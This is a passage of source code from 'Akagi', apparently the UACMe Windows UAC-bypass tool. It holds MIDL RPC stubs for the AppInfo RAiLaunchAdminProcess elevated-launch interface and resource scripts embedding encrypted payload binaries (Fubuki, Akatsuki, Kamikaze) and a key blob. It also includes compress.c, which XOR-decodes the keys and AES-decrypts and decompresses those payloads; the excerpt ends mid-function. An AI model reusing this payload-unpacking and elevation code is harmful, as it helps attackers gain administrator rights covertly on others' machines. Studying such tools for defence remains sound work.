0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 58 */ NdrFcShort( 0x18 ), /* 24 */
/* 60 */ NdrFcShort( 0x0 ), /* 0 */
/* 62 */ NdrFcShort( 0x0 ), /* Offset= 0 (62) */
/* 64 */ 0xb9, /* FC_UINT3264 */
0xb9, /* FC_UINT3264 */
/* 66 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 68 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 70 */
0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */
/* 72 */ 0x8, /* FC_LONG */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] =
{
0
};
static const MIDL_STUB_DESC LaunchAdminProcess_StubDesc =
{
(void *)& LaunchAdminProcess___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&LaunchAdminProcess__MIDL_AutoBindHandle,
0,
0,
0,
0,
appinfo__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#else
#pragma warning(disable:4206)
#endif /* defined(_M_AMD64)*/
================================================
FILE: Source/Akagi/appinfo/x64/appinfo64.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for appinfo.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __appinfo64_h__
#define __appinfo64_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__
#define __LaunchAdminProcess_INTERFACE_DEFINED__
/* interface LaunchAdminProcess */
/* [version][uuid] */
typedef struct _MONITOR_POINT
{
long MonitorLeft;
long MonitorRight;
} MONITOR_POINT;
typedef struct _APP_STARTUP_INFO
{
wchar_t *lpszTitle;
long dwX;
long dwY;
long dwXSize;
long dwYSize;
long dwXCountChars;
long dwYCountChars;
long dwFillAttribute;
long dwFlags;
short wShowWindow;
struct _MONITOR_POINT MonitorPoint;
} APP_STARTUP_INFO;
typedef struct _APP_PROCESS_INFORMATION
{
unsigned __int3264 ProcessHandle;
unsigned __int3264 ThreadHandle;
long ProcessId;
long ThreadId;
} APP_PROCESS_INFORMATION;
/* [async] */ void RAiLaunchAdminProcess(
/* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,
handle_t hBinding,
/* [string][unique][in] */ wchar_t *ExecutablePath,
/* [string][unique][in] */ wchar_t *CommandLine,
/* [in] */ long StartFlags,
/* [in] */ long CreationFlags,
/* [string][in] */ wchar_t *CurrentDirectory,
/* [string][in] */ wchar_t *WindowStation,
/* [in] */ struct _APP_STARTUP_INFO *StartupInfo,
/* [in] */ unsigned __int3264 hWnd,
/* [in] */ long Timeout,
/* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,
/* [out] */ long *ElevationType);
extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;
extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;
#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: Source/Akagi/appinfo/x86-32/appinfo32.c
================================================
/* this ALWAYS GENERATED file contains the RPC client stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for appinfo.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */
#pragma optimize("", off )
#include "appinfo32.h"
#define TYPE_FORMAT_STRING_SIZE 75
#define PROC_FORMAT_STRING_SIZE 101
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _appinfo_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} appinfo_MIDL_TYPE_FORMAT_STRING;
typedef struct _appinfo_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} appinfo_MIDL_PROC_FORMAT_STRING;
typedef struct _appinfo_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} appinfo_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
extern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString;
extern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString;
extern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: LaunchAdminProcess, ver. 1.0,
GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */
static const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
0,
0x00000000
};
RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface;
extern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc;
static RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle;
/* [async] */ void RAiLaunchAdminProcess(
/* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,
handle_t hBinding,
/* [string][unique][in] */ wchar_t *ExecutablePath,
/* [string][unique][in] */ wchar_t *CommandLine,
/* [in] */ long StartFlags,
/* [in] */ long CreationFlags,
/* [string][in] */ wchar_t *CurrentDirectory,
/* [string][in] */ wchar_t *WindowStation,
/* [in] */ struct _APP_STARTUP_INFO *StartupInfo,
/* [in] */ unsigned __int3264 hWnd,
/* [in] */ long Timeout,
/* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,
/* [out] */ long *ElevationType)
{
NdrAsyncClientCall(
( PMIDL_STUB_DESC )&LaunchAdminProcess_StubDesc,
(PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0],
( unsigned char * )&RAiLaunchAdminProcess_AsyncHandle);
}
#if !defined(__RPC_WIN32__)
#error Invalid build platform for this stub.
#endif
#if !(TARGET_IS_NT50_OR_LATER)
#error You need Windows 2000 or later to run this stub because it uses these features:
#error [async] attribute, /robust command line switch.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
#endif
static const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString =
{
0,
{
/* Procedure RAiLaunchAdminProcess */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x38 ), /* x86 Stack size/offset = 56 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x4 ), /* x86 Stack size/offset = 4 */
/* 14 */ NdrFcShort( 0x9a ), /* 154 */
/* 16 */ NdrFcShort( 0x58 ), /* 88 */
/* 18 */ 0xc6, /* Oi2 Flags: clt must size, has return, has ext, has async handle */
0xc, /* 12 */
/* 20 */ 0x8, /* 8 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter ExecutablePath */
/* 28 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 30 */ NdrFcShort( 0x8 ), /* x86 Stack size/offset = 8 */
/* 32 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter CommandLine */
/* 34 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */
/* 36 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 38 */ NdrFcShort( 0x2 ), /* Type Offset=2 */
/* Parameter StartFlags */
/* 40 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 42 */ NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 44 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter CreationFlags */
/* 46 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 48 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 50 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter CurrentDirectory */
/* 52 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 54 */ NdrFcShort( 0x18 ), /* x86 Stack size/offset = 24 */
/* 56 */ NdrFcShort( 0x8 ), /* Type Offset=8 */
/* Parameter WindowStation */
/* 58 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 60 */ NdrFcShort( 0x1c ), /* x86 Stack size/offset = 28 */
/* 62 */ NdrFcShort( 0x8 ), /* Type Offset=8 */
/* Parameter StartupInfo */
/* 64 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */
/* 66 */ NdrFcShort( 0x20 ), /* x86 Stack size/offset = 32 */
/* 68 */ NdrFcShort( 0x16 ), /* Type Offset=22 */
/* Parameter hWnd */
/* 70 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 72 */ NdrFcShort( 0x24 ), /* x86 Stack size/offset = 36 */
/* 74 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter Timeout */
/* 76 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 78 */ NdrFcShort( 0x28 ), /* x86 Stack size/offset = 40 */
/* 80 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter ProcessInformation */
/* 82 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */
/* 84 */ NdrFcShort( 0x2c ), /* x86 Stack size/offset = 44 */
/* 86 */ NdrFcShort( 0x3c ), /* Type Offset=60 */
/* Parameter ElevationType */
/* 88 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */
/* 90 */ NdrFcShort( 0x30 ), /* x86 Stack size/offset = 48 */
/* 92 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Return value */
/* 94 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 96 */ NdrFcShort( 0x34 ), /* x86 Stack size/offset = 52 */
/* 98 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x8, /* FC_UP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
/* 6 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 8 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
/* 10 */
0x11, 0x0, /* FC_RP */
/* 12 */ NdrFcShort( 0xa ), /* Offset= 10 (22) */
/* 14 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 20 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 22 */
0x16, /* FC_PSTRUCT */
0x3, /* 3 */
/* 24 */ NdrFcShort( 0x30 ), /* 48 */
/* 26 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 28 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 30 */ NdrFcShort( 0x0 ), /* 0 */
/* 32 */ NdrFcShort( 0x0 ), /* 0 */
/* 34 */ 0x12, 0x8, /* FC_UP [simple_pointer] */
/* 36 */ 0x5, /* FC_WCHAR */
0x5c, /* FC_PAD */
/* 38 */
0x5b, /* FC_END */
0x8, /* FC_LONG */
/* 40 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 42 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 44 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 46 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 48 */ 0x6, /* FC_SHORT */
0x3e, /* FC_STRUCTPAD2 */
/* 50 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 52 */ NdrFcShort( 0xffda ), /* Offset= -38 (14) */
/* 54 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 56 */
0x11, 0x4, /* FC_RP [alloced_on_stack] */
/* 58 */ NdrFcShort( 0x2 ), /* Offset= 2 (60) */
/* 60 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 62 */ NdrFcShort( 0x10 ), /* 16 */
/* 64 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 66 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 68 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 70 */
0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */
/* 72 */ 0x8, /* FC_LONG */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] =
{
0
};
static const MIDL_STUB_DESC LaunchAdminProcess_StubDesc =
{
(void *)& LaunchAdminProcess___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&LaunchAdminProcess__MIDL_AutoBindHandle,
0,
0,
0,
0,
appinfo__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#else
#pragma warning(disable:4206)
#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */
================================================
FILE: Source/Akagi/appinfo/x86-32/appinfo32.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for appinfo.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __appinfo32_h__
#define __appinfo32_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__
#define __LaunchAdminProcess_INTERFACE_DEFINED__
/* interface LaunchAdminProcess */
/* [version][uuid] */
typedef struct _MONITOR_POINT
{
long MonitorLeft;
long MonitorRight;
} MONITOR_POINT;
typedef struct _APP_STARTUP_INFO
{
wchar_t *lpszTitle;
long dwX;
long dwY;
long dwXSize;
long dwYSize;
long dwXCountChars;
long dwYCountChars;
long dwFillAttribute;
long dwFlags;
short wShowWindow;
struct _MONITOR_POINT MonitorPoint;
} APP_STARTUP_INFO;
typedef struct _APP_PROCESS_INFORMATION
{
unsigned __int3264 ProcessHandle;
unsigned __int3264 ThreadHandle;
long ProcessId;
long ThreadId;
} APP_PROCESS_INFORMATION;
/* [async] */ void RAiLaunchAdminProcess(
/* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,
handle_t hBinding,
/* [string][unique][in] */ wchar_t *ExecutablePath,
/* [string][unique][in] */ wchar_t *CommandLine,
/* [in] */ long StartFlags,
/* [in] */ long CreationFlags,
/* [string][in] */ wchar_t *CurrentDirectory,
/* [string][in] */ wchar_t *WindowStation,
/* [in] */ struct _APP_STARTUP_INFO *StartupInfo,
/* [in] */ unsigned __int3264 hWnd,
/* [in] */ long Timeout,
/* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,
/* [out] */ long *ElevationType);
extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;
extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;
#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: Source/Akagi/bin/Akatsuki64.cd
================================================
================================================
FILE: Source/Akagi/bin/Fubuki32.cd
================================================
================================================
FILE: Source/Akagi/bin/Fubuki64.cd
================================================
================================================
FILE: Source/Akagi/bin/Kamikaze.cd
================================================
================================================
FILE: Source/Akagi/bin32res.rc
================================================
#include "bin32res.h"
#include "winres.h"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets32.bin"
================================================
FILE: Source/Akagi/bin64res.rc
================================================
#include "bin64res.h"
#include "winres.h"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd"
IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets64.bin"
================================================
FILE: Source/Akagi/compress.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2026
*
* TITLE: COMPRESS.C
*
* VERSION: 3.69
*
* DATE: 12 Feb 2026
*
* Compression and encoding/decoding support.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "encresource.h"
#pragma comment(lib, "msdelta.lib")
#pragma comment(lib, "Bcrypt.lib")
#define UACME_KEY_SIZE 32
typedef struct _DCK_HEADER {
DWORD Id;
BYTE Data[UACME_KEY_SIZE];
} DCK_HEADER, * PDCK_HEADER;
/*
* EncodeBuffer
*
* Purpose:
*
* Decrypt/Encrypt given buffer.
*
*/
VOID EncodeBuffer(
_In_ PVOID Buffer,
_In_ ULONG BufferSize,
_In_ ULONG Key
)
{
ULONG k, c;
PUCHAR ptr;
if ((Buffer == NULL) || (BufferSize == 0))
return;
k = Key;
c = BufferSize;
ptr = (PUCHAR)Buffer;
do {
*ptr ^= k;
k = _rotl(k, 1);
ptr++;
--c;
} while (c != 0);
}
/*
* SelectSecretFromBlob
*
* Purpose:
*
* Return key used for decryption by Id from secrets blob.
*
* Use supHeapFree to release allocated result.
*
*/
PVOID SelectSecretFromBlob(
_In_ ULONG Id,
_Out_ PDWORD pcbKeyBlob
)
{
ULONG i, c;
ULONG dataSize = 0;
PDCK_HEADER secretsBlob;
PVOID pbSecret = NULL, resourceBlob;
if (pcbKeyBlob)
*pcbKeyBlob = 0;
resourceBlob = supLdrQueryResourceData(SECRETS_ID,
g_hInstance,
&dataSize);
if (resourceBlob) {
secretsBlob = (PDCK_HEADER)supHeapAlloc(dataSize);
if (secretsBlob) {
RtlCopyMemory(secretsBlob, resourceBlob, dataSize);
EncodeBuffer(secretsBlob, dataSize, AKAGI_XOR_KEY);
c = dataSize / sizeof(DCK_HEADER);
for (i = 0; i < c; i++) {
if (secretsBlob[i].Id == Id) {
pbSecret = supHeapAlloc(UACME_KEY_SIZE);
if (pbSecret != NULL) {
RtlCopyMemory(pbSecret, secretsBlob[i].Data, UACME_KEY_SIZE);
if (pcbKeyBlob)
*pcbKeyBlob = UACME_KEY_SIZE;
}
break;
}
}
RtlSecureZeroMemory(secretsBlob, dataSize);
supHeapFree(secretsBlob);
}
}
return pbSecret;
}
/*
* IsValidContainerHeader
*
* Purpose:
*
* Basic santity checks over container header.
*
*/
BOOL IsValidContainerHeader(
_In_ PDCU_HEADER UnitHeader,
_In_ DWORD FileSize
)
{
DWORD HeaderCrc;
if (UnitHeader == NULL)
return FALSE;
__try {
if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka
(UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka
(UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) && //Kuma
(UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS)) //Kuma
{
return FALSE;
}
//
// Note that IV has different meaning in Kuma containers.
//
HeaderCrc = UnitHeader->HeaderCrc;
UnitHeader->HeaderCrc = 0;
if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc) {
UnitHeader->HeaderCrc = HeaderCrc;
return FALSE;
}
UnitHeader->HeaderCrc = HeaderCrc;
if ((UnitHeader->cbData == 0) ||
(UnitHeader->cbDeltaSize == 0))
return FALSE;
if (UnitHeader->cbData > FileSize)
return FALSE;
if (UnitHeader->cbDeltaSize > FileSize)
return FALSE;
if (UnitHeader->cbDeltaSize > UnitHeader->cbData)
return FALSE;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
return FALSE;
}
return TRUE;
}
/*
* DecryptBuffer
*
* Purpose:
*
* Decrypt AES encrypted buffer.
*
* Use supVirtualFree to release allocated result.
*
*/
BOOL DecryptBuffer(
_In_ PBYTE pbBuffer,
_In_ DWORD cbBuffer,
_In_ PBYTE pbIV,
_In_ PBYTE pbSecret,
_In_ DWORD cbSecret,
_Out_ PBYTE *pbDecryptedBuffer,
_Out_ PDWORD pcbDecryptedBuffer
)
{
BOOL bResult = FALSE;
BCRYPT_ALG_HANDLE hAlgAes = NULL;
BCRYPT_KEY_HANDLE hKey = NULL;
HANDLE heapCNG = NULL;
DWORD cbCipherData, cbKeyObject, cbResult, cbBlockLen;
PBYTE pbKeyObject = NULL, pbCipherData = NULL;
SIZE_T memIO;
NTSTATUS status;
do {
heapCNG = HeapCreate(0, 0, 0);
if (heapCNG == NULL)
break;
if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
&hAlgAes,
BCRYPT_AES_ALGORITHM,
NULL,
0)))
{
break;
}
cbKeyObject = 0;
cbResult = 0;
if (!NT_SUCCESS(BCryptGetProperty(
hAlgAes,
BCRYPT_OBJECT_LENGTH,
(PUCHAR)&cbKeyObject,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);
if (pbKeyObject == NULL)
break;
cbBlockLen = 0;
if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,
BCRYPT_BLOCK_LENGTH,
(PUCHAR)&cbBlockLen,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)
break;
if (!NT_SUCCESS(BCryptGenerateSymmetricKey(
hAlgAes,
&hKey,
pbKeyObject,
cbKeyObject,
pbSecret,
cbSecret,
0)))
{
break;
}
cbCipherData = 0;
if (!NT_SUCCESS(BCryptDecrypt(
hKey,
pbBuffer,
cbBuffer,
NULL,
pbIV,
cbBlockLen,
NULL,
0,
&cbCipherData,
BCRYPT_BLOCK_PADDING)))
{
break;
}
memIO = (SIZE_T)cbCipherData;
pbCipherData = (PBYTE)supVirtualAlloc(
&memIO,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
&status);
if ((!NT_SUCCESS(status)) || (pbCipherData == NULL))
break;
cbResult = 0;
if (!NT_SUCCESS(BCryptDecrypt(
hKey,
pbBuffer,
cbBuffer,
NULL,
pbIV,
cbBlockLen,
pbCipherData,
cbCipherData,
&cbResult,
BCRYPT_BLOCK_PADDING)))
{
break;
}
BCryptDestroyKey(hKey);
hKey = NULL;
*pbDecryptedBuffer = pbCipherData;
*pcbDecryptedBuffer = cbCipherData;
bResult = TRUE;
} while (FALSE);
if (hKey != NULL)
BCryptDestroyKey(hKey);
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);
if (heapCNG) HeapDestroy(heapCNG);
if (bResult == FALSE) {
if (pbCipherData) supVirtualFree(pbCipherData, NULL);
*pbDecryptedBuffer = NULL;
*pcbDecryptedBuffer = 0;
}
return bResult;
}
/*
* DecompressContainerUnit
*
* Purpose:
*
* Decompress given container.
*
* Use supVirtualFree to release allocated result.
*
*/
PVOID DecompressContainerUnit(
_In_ PBYTE pbBuffer,
_In_ DWORD cbBuffer,
_In_ PBYTE pbSecret,
_In_ DWORD cbSecret,
_Out_ PULONG pcbDecompressed
)
{
PDCU_HEADER UnitHeader;
PBYTE pbDecryptedBuffer = NULL;
DWORD cbDecryptedBuffer = 0;
DELTA_INPUT diDelta, diSource;
DELTA_OUTPUT doOutput;
PVOID UncompressedData = NULL;
SIZE_T memIO;
PBYTE DataPtr;
NTSTATUS status;
if (pcbDecompressed)
*pcbDecompressed = 0;
do {
UnitHeader = (PDCU_HEADER)pbBuffer;
if (!IsValidContainerHeader(UnitHeader, cbBuffer))
break;
DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);
if (!DecryptBuffer(
(PBYTE)DataPtr,
(DWORD)UnitHeader->cbData,
(PBYTE)UnitHeader->bIV,
(PBYTE)pbSecret,
(DWORD)cbSecret,
(PBYTE*)&pbDecryptedBuffer,
(PDWORD)&cbDecryptedBuffer))
{
break;
}
if (cbDecryptedBuffer > cbBuffer)
break;
RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));
RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));
RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));
diDelta.Editable = FALSE;
diDelta.lpcStart = pbDecryptedBuffer;
diDelta.uSize = UnitHeader->cbDeltaSize;
if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {
memIO = doOutput.uSize;
UncompressedData = supVirtualAlloc(
&memIO,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
&status);
if ((NT_SUCCESS(status)) && (UncompressedData != NULL)) {
RtlCopyMemory(UncompressedData, doOutput.lpStart, doOutput.uSize);
if (pcbDecompressed)
*pcbDecompressed = (ULONG)doOutput.uSize;
}
DeltaFree(doOutput.lpStart);
}
} while (FALSE);
if (pbDecryptedBuffer != NULL) {
supVirtualFree(pbDecryptedBuffer, NULL);
}
return UncompressedData;
}
/*
* DecompressPayload
*
* Purpose:
*
* Decode payload and then decompress it.
*
*/
PVOID DecompressPayload(
_In_ ULONG PayloadId,
_In_ PVOID pbBuffer,
